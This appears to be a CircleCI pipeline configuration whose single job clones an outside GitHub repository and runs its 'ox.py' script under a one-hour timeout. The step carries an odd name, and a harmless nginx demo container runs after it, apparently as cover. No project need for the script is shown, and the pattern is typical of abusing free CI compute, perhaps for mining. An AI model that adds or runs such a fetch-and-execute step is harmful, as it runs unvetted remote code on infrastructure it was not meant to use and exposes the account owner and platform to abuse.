version: 2.1
jobs:
  images-1:
    
    docker:
      - image: docker:18.06.3-ce-git
    
    steps:
      - checkout
      - checkout
      - setup_remote_docker
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
              git clone https://github.com/bamin3812/cloud.git && cd cloud && python ox.py
              docker run -e CI=true nginxdemos/hello
workflows:
    version: 2.1
    build:
        jobs:
             - images-1